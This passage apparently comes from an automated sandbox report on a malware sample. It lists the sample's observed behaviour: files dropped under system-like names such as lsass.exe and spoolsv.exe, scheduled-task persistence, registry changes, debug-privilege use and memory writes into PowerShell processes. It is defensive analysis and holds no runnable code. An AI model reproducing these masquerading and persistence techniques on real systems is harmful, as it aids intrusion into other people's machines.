File opened for modification C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Multimedia Platform\5940a34987c991 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\121e5b5079f7c0 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\Windows Media Player\Icons\SppExtComObj.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\eddb19405b7ce1 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\winlogon.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\RCX455B.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Portable Devices\backgroundTaskHost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\Uninstall Information\upfc.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\Microsoft Office 15\ClientX64\ee2ad38f3d4382 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\Uninstall Information\ea1d8f6d871115 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\f3b6ecef712a24 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Portable Devices\backgroundTaskHost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\VideoLAN\RCX4B69.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files\VideoLAN\upfc.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\L2Schemas\lsass.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\it-IT\OfficeClickToRun.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\OCR\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\unsecapp.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\Migration\WTR\lsass.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\Offline Web Pages\dllhost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\L2Schemas\RCX3ED0.tmp C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\Migration\WTR\6203df4a6bafc7 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\Offline Web Pages\dllhost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\Offline Web Pages\5940a34987c991 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\it-IT\OfficeClickToRun.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\BitLockerDiscoveryVolumeContents\unsecapp.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\L2Schemas\6203df4a6bafc7 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\CSC\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\L2Schemas\lsass.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\Migration\WTR\lsass.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\it-IT\e6c9b481da804f C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\SystemResources\backgroundTaskHost.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\29c1c3cc0f7685 C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\MoUsoCoreWorker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1956 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4104 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4104 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\cmd.exe
PID 1956 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\cmd.exe
PID 224 wrote to memory of 952 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 224 wrote to memory of 952 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 224 wrote to memory of 4136 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe
PID 224 wrote to memory of 4136 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe
PID 4136 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4136 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
